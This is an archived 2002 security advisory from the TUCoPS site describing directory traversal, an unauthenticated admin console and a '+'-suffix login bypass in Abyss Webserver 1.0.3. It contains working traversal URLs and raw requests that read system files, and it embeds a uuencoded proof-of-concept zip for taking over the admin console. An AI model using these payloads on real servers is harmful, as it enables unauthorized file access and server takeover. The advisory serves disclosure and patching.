Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: web5656.htm

Abyss Webserver Directory Traversal



23th Aug 2002 [SBWID-5656]
COMMAND

	
		Abyss webserver directory traversal and administration bugs
	
	

SYSTEMS AFFECTED

	
		1.0.3 (patch 2) and previous, both Windows and Linux
	
	

PROBLEM

	
		In   Auriemma   Luigi   [aluigi@pivx.com],   PivX   security    advisory
		[http://www.PivX.com] :
		

		 A] Directory traversal bug

		 ==========================

		

		The first problem I want to show, is about viewing all the files in  the
		systems where Abyss 1.0.3 (patch 2) and previous run.
		

		This problem is caused by the character '\' (%5c) that  is  not  checked
		as bad character, so the server follow the path  in  the  URI  that  the
		attacker give until it reach the file requested.
		

		The following are two simple examples for see the winnt\win.ini file:
		

		http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini

		"GET /\..\..\..\..\..\winnt\win.ini HTTP/1.0"

		

		This last is an HTTP request that can be sent with telnet  because  some
		browsers can modify the "\.." chars.
		

		It is also possible to view the index of the directories  (but  not  the
		root) ONLY if the AutoIndex option is not disabled (default is  enable).
		This is for view winnt:
		

		http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt/

		

		In Linux fortunally the attacker cannot go down to the path, but he  can
		go only in the Abyss folder and see SOME files like,  for  example,  the
		files in cgi-bin and chl directory but NOT the abyss.conf  or  the  logs
		(this is the same also on Windows). Two simple example are:
		

		http://host/%2f%2e%2e%2f

		http://host/%2f%2e%2e%2fcgi-bin/

		

		and we will see the index of the Abyss and cgi-bin folder.
		

		

		 B] Administration bug (fixed in patch 2 release)

		 ================================================

		

		The console used in Abyss is the same web server that is binded to  port
		9999 (another default port can be the 81) and look to the files  in  the
		CHL directory of the server. In this directory there are all  the  files
		to manage the server  remotely  so  the  administrator  can  change  the
		parameters without modifing the abyss.conf file manually.
		

		This  bug  is  really  incredible...  an  attacker  without  login   can
		reconfigure every parameter of the server. Some  examples  of  what  the
		attacker can do are:
		

		 - Stop, Run and Halt the server

		 - change username and password of the administrator

		 - change all the advanced parameters of the server (log files, number

		   of requests, etc...)

		 - all the thing that the real administrator can do

		

		The only limit for the attacker is  that  he  cannot  know  the  current
		settings of the server, but I think that it is not so important  because
		he can redefine  all!  Remember  that  the  attacker  can  redifine  the
		administrator login and he will be the real administrator.
		

		The proof-of-concept can be downloaded from my userpage:
		

		http://www.pivx.com/luigi/poc/abyss-adm.zip

		

		

		 C] Characters adding

		 ====================

		

		This  is  a  problem  that  is  diffused  on  almost  all  the   Windows
		applications and not only.
		

		The problem is that adding some characters (in this case  the  '+')  the
		attacker can read "for example" the .chl files bypassing the login.  Not
		a bad bug, but is better to fix bugs like this before they can  be  used
		for more dangerous exploitations.
		

		Simple examples are:
		

		http://host:9999/srvstatus.chl+

		http://host:9999/consport.chl+

		http://host:9999/conspass.chl+

		http://host:9999/general.chl+

		

		

		3) The Code
		

		 A] Example of the directory traversal bug on Win:

		

		http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini

		"GET /\..\..\..\..\..\winnt\win.ini HTTP/1.0"

		

		Abyss index on Linux:
		

		http://host/%2f%2e%2e%2f

		

		

		 B] For the administration bug watch the html file in my userpage

		

		http://www.pivx.com/luigi/poc/abyss-adm.zip

		

		It can be used to test the server that run on the same machine,  at  the
		address 127.0.0.1. If you want to test  other  machines  simply  replace
		the string "http://127.0.0.1:9999" at line 4 of the html with  the  host
		and the port you want.
		

		 C] Add the '+' char at the end of the file requested.

		

		

		

		UUEncode

		

		begin 644 abyss-adm.zip

		M4$L#!!0````(`)B*%2W]_OH0A`0``&<2```)````86)Y<W,N:'1MW5AM;]I(

		M$/X>*?]ASJW4Y-3@O/1>BL`Z%YP&-0$$Y-K>AYX6>\$KV5[?[AK"O[\9&QL2

		M4J"7.S6Z$`B[._/,VS.[ZS1"$T?.X4%CS#2'4/%)\_#@\,`*C4GKMGUV_DOM

		M%%]G];?X8]&20Q^-L0P6,)[Z,I*J:;VX/*6714!&F(@[[GBA-9RAZ@6P(!:)

		MT$8Q(V0"J9)R<H*_ODQ\GIJ&7:B@KL\3PU7NCM,(+YP&*UPJW9G/YS66*AZ)

		M+*[Y,K8*.PV;.;NMA.=.PT9<&X$/#V9<:9(K7#Q*F?%#.#^&B;@#$W(89]/&

		M6#GT1G?LB4P,?ADOP,V4X'',X#H34Y'+N'`U\"Z;5LQ$9&2=1;3R6RIF=X63

		M#R8:MNNL8U=1=WLCKU[,MD*63#E@'KY2"@H%F(%()!S>@)R@UT(#E1/$!!8R

		M@SE+#!@)AFL#$H-2H!?:\%@#2X+E3"J5T;7"Z`CC+F9E2DE$N1F&Q,81!Z8X

		M4()C%FG0$CH0LAF'1!H0B1]E`0\H;S$<B23@=YC'B.O7P"+!\`\W?JU6.R[,

		MK!>:2EUDXN3D9)F0?,(9<C4CCPTSF<X+5RI?]@8WX+9&G5ZW:=D:W;#@QAM=

		M]=I-J]\;CG(:=KK]VQ&,/O>]IG75:;>]K@5=]P9'+W,'+?C=O;[%X9=B_&67

		MUH`'0G'?5(KVOAI_>DI)M=+3:E9$5?/#:`-D>/ONIC.JI&%H9`HEYH\:1SM5

		M!EFRTE!9LE/ABD5FI1'B*%>Q*=-;B]1"DDAD!['H6=;(+QQ\---[EHL@*+X2

		MHXRYCW-U>(`Y\CYA7H>=/_#[3R7T4H,4*MB\B<LM8$MMW`P[N,U-'M6R0`SG

		M@F)J5V6A]P%6E<W2@!F^2ZG%<,>,*B6_&.Y'"'>U"TL%D9R*!#0W1B33Y]G$

		M_Q9!F*[:^7X.KBD']2TT.3\M+>3IJG!+=O01>BY5L,&UOCL<?NP-VIM`+TN=

		MTS4T.BPXPZ/@9_!#IO1]='"G;-///4R<[33QS01=UN2_Y.E[GG#%HN?-S7]*

		MR&D17,G'Y4DZD-)LX^&;JK:%`LEOD+$M_2S&PUM#GYEP/SB2W&0U[9[[;)[W

		M=LU?3_?9,[_#KC<C\>!YTXDMO7S*7H=WEY0I%E=['1Y%,=ZX?6CG\E(MH$/^

		M81:HO$/OVFN-EJ@DG"]B$7M]R@<4ZU[;^<PQ:<5DN>ATY6K*+B2761V)F,O,

		MP)&FS2+0Q]NH=%%&15J];)61LXI-'SA/3]Q(X(UVP/_*\,*L]T(DO5SM$<P;

		M=B?B+(8A?D:&)>BP_C9T1,"K0X)II<MX9>*\,H%G"USB17N_/D1I$JYP\+BQ

		MF>]S/+GPZ[-LK-;[SO^_I_RIJ.Z6&&]?2:H)A@Q>0L]>P48CH5BQ].1&(H.Y

		M.U_ET;O>ITTJD0.DM<$GBF6-3`0_])5(C7X%>S7MFKF+-6L/6_>BZH$!Q[L"

		M]JV@)\I4X;58099GCQ[C/V)AY9SZ;DHWLL4CF;S5>-8MEY^<S^W>Z#P5KS2\

		M^"%_<'^LL.A.D;$G^_(=.GFSC^W\'TQ_`U!+`0(4`!0````(`)B*%2W]_OH0

		MA`0``&<2```)``````````$`(`"V@0````!A8GES<RYH=&U02P4&``````$`

		,`0`W````JP0`````

		`

		end

		1272 bytes

		

		
	
	

SOLUTION

	
		Abyss 1.0.3 (patch 3) from the Aprelium web-site:
		

		http://www.aprelium.com

		

		or directly the updated executable:
		

		http://www.aprelium.com/news/patch1033.html

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH